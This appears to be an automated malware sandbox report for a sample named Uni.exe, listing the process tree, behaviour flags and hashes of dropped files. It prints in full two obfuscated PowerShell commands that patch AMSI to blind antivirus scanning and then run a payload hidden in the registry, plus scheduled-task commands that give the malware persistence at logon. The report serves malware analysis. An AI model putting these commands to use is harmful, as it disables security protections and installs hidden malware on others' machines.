37 PID 3548 wrote to memory of 2176 3548 dllhost.exe 38 PID 3548 wrote to memory of 2248 3548 dllhost.exe 40 PID 3548 wrote to memory of 2308 3548 dllhost.exe 41 PID 3548 wrote to memory of 2472 3548 dllhost.exe 42 PID 676 wrote to memory of 3412 676 lsass.exe 92 PID 676 wrote to memory of 3412 676 lsass.exe 92 PID 3548 wrote to memory of 2480 3548 dllhost.exe 43 PID 676 wrote to memory of 3412 676 lsass.exe 92 PID 676 wrote to memory of 3412 676 lsass.exe 92 PID 676 wrote to memory of 3412 676 lsass.exe 92 PID 3548 wrote to memory of 2664 3548 dllhost.exe 44
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:60
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{e958a193-9963-4c23-9ea2-cf892b129985}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3548
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{fe4478b9-0051-4074-b630-a9dc39d9cb95}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:644
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:512
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:944
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1088
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1132
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1168
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:mCXkdBosmkrz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jQrnzePqSeFjVJ,[Parameter(Position=1)][Type]$itemsMtXpB)$LLbeBYuINnx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+'le'+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+''+'r'+'y'+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+'S'+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+','+'A'+'n'+''+'s'+''+'i'+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+'',[MulticastDelegate]);$LLbeBYuINnx.DefineConstructor('RTSp'+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+'m'+''+[Char](101)+''+','+'Hi'+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$jQrnzePqSeFjVJ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nti'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'g'+'e'+'d');$LLbeBYuINnx.DefineMethod(''+[Char](73)+'n'+[Char](118)+'o'+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+'ByS'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+'V'+''+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$itemsMtXpB,$jQrnzePqSeFjVJ).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+'i'+'me'+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ge'+[Char](100)+'');Write-Output $LLbeBYuINnx.CreateType();}$qhfxpecUiWpvl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'ste'+'m'+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'ro'+[Char](115)+'o'+'f'+'t'+'.'+''+[Char](87)+'i'+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+'ho'+[Char](100)+''+[Char](115)+'');$ZDzpwzKWMdMfbJ=$qhfxpecUiWpvl.GetMethod('G'+'e'+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+'d'+''+[Char](100)+'res'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+'t'+'a'+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MOAleEdLausBlxfMMlz=mCXkdBosmkrz @([String])([IntPtr]);$xSmgXuSOZSVHWTKuJvfOLi=mCXkdBosmkrz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cJJXSYshHhV=$qhfxpecUiWpvl.GetMethod('G'+[Char](101)+'t'+'M'+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object]('ke'+'r'+'n'+[Char](101)+''+[Char](108)+'3'+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$DujHIhsutrTluc=$ZDzpwzKWMdMfbJ.Invoke($Null,@([Object]$cJJXSYshHhV,[Object]('L'+'o'+'a'+[Char](100)+'L'+'i'+''+'b'+''+'r'+'a'+'r'+''+[Char](121)+''+[Char](65)+'')));$AYJBwFEEtVlwgGEgo=$ZDzpwzKWMdMfbJ.Invoke($Null,@([Object]$cJJXSYshHhV,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+'a'+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$lqgfIcf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DujHIhsutrTluc,$MOAleEdLausBlxfMMlz).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+'l'+'l');$yEpjVjUFedPqzTNwa=$ZDzpwzKWMdMfbJ.Invoke($Null,@([Object]$lqgfIcf,[Object]('A'+[Char](109)+'s'+[Char](105)+''+'S'+''+'c'+''+'a'+''+'n'+''+[Char](66)+''+'u'+''+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$TBSoVryaKg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AYJBwFEEtVlwgGEgo,$xSmgXuSOZSVHWTKuJvfOLi).Invoke($yEpjVjUFedPqzTNwa,[uint32]8,4,[ref]$TBSoVryaKg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$yEpjVjUFedPqzTNwa,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AYJBwFEEtVlwgGEgo,$xSmgXuSOZSVHWTKuJvfOLi).Invoke($yEpjVjUFedPqzTNwa,[uint32]8,0x20,[ref]$TBSoVryaKg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+'7'+''+[Char](115)+''+[Char](116)+'a'+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:VHUlKDHOaaXL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fGdQtsyqVZZYAp,[Parameter(Position=1)][Type]$joTUiHyUGU)$nOrjXkmlbTq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+'e'+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+'m'+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+'l'+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+'y'+''+'p'+'e',''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'al'+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsi'+'C'+''+'l'+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nOrjXkmlbTq.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+'m'+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'e'+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fGdQtsyqVZZYAp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$nOrjXkmlbTq.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+'k'+'e'+'',''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+'eBy'+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+'N'+'e'+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+'i'+'r'+'t'+''+'u'+'al',$joTUiHyUGU,$fGdQtsyqVZZYAp).SetImplementationFlags('R'+[Char](117)+''+'n'+''+'t'+'im'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $nOrjXkmlbTq.CreateType();}$sNozhZzIkcwMl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+'.'+''+'W'+''+'i'+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+'t'+''+[Char](104)+''+'o'+'d'+[Char](115)+'');$KhXHYMKLDxWdAN=$sNozhZzIkcwMl.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+'c'+'A'+[Char](100)+''+'d'+''+[Char](114)+''+'e'+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$QVeotFJywKvrBXvXUQo=VHUlKDHOaaXL @([String])([IntPtr]);$SyYRqsqyiLxfNsUkbPmJig=VHUlKDHOaaXL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BtnfBJpTPbl=$sNozhZzIkcwMl.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+'ul'+'e'+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'rnel'+[Char](51)+'2'+'.'+'d'+'l'+''+'l'+'')));$DghpFKiqjocmUY=$KhXHYMKLDxWdAN.Invoke($Null,@([Object]$BtnfBJpTPbl,[Object](''+'L'+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$SayvemgIQDQzOnRLO=$KhXHYMKLDxWdAN.Invoke($Null,@([Object]$BtnfBJpTPbl,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+'l'+[Char](80)+''+'r'+''+[Char](111)+'t'+'e'+'c'+'t'+'')));$QAjoSlF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DghpFKiqjocmUY,$QVeotFJywKvrBXvXUQo).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+'i'+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'');$vmmOrbSJWRDLUTNVw=$KhXHYMKLDxWdAN.Invoke($Null,@([Object]$QAjoSlF,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+'B'+'u'+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$KMmjuSvLTi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SayvemgIQDQzOnRLO,$SyYRqsqyiLxfNsUkbPmJig).Invoke($vmmOrbSJWRDLUTNVw,[uint32]8,4,[ref]$KMmjuSvLTi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vmmOrbSJWRDLUTNVw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SayvemgIQDQzOnRLO,$SyYRqsqyiLxfNsUkbPmJig).Invoke($vmmOrbSJWRDLUTNVw,[uint32]8,0x20,[ref]$KMmjuSvLTi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+'WAR'+[Char](69)+'').GetValue(''+[Char](36)+'77'+[Char](115)+'t'+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4048 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3428
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1456
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
PID:2676
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1672
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1764
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1800
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1904
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1160
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:1692
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2092
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2176
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2248
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2724
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2752
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2824
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2848
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2932
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2768
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3400
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3564 -
C:\Users\Admin\AppData\Local\Temp\Uni.exe"C:\Users\Admin\AppData\Local\Temp\Uni.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:2968
-
-
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:3928
-
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
PID:1540
-
-
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
PID:2640
-
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4032
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3688
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3868
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:4020
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2372
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4376
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4180
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3776
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4980
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:2552
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:5000
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4876
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4320
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:1644
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:636
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵PID:3412
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4700
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
409KB
MD57417c8c73e614f293152575f46134216
SHA1cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
SHA25600c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
SHA512897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
Filesize412B
MD54fbd4d87af338fa7b3d43a611231603e
SHA10588e60b8c334785ef21e346bdca446e5f38464b
SHA256e9d08ab02bf535211eb0583061c47b4276bd866b639f06137993e7fc6d11e186
SHA51263f6396ce7e153f48733d3649dbbc8f193e4121de68f7b9c1088566e3559abd71fcb8b320c4e4b1c2c86a4862f9cb2e8b77f610feea491a0e41f372e7f7dcaa4
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize332B
MD57797053c50e2dc8a7a685359cb724b3b
SHA13c19b667e3277e1275779709f6da6769c3d9d688
SHA25657975687d822833ecb3ffd00e81e8c1b90f5c4463ce6ca7cd3a957a50054a5be
SHA512639bce4423e77f0e0dc8570efe010cdd96b6bb334e519c4f1df6e8e4f3d6aee5f6c1041c15c08279f6748ad6dca997e2e5e610956904e5b66f9088a33a94b5f9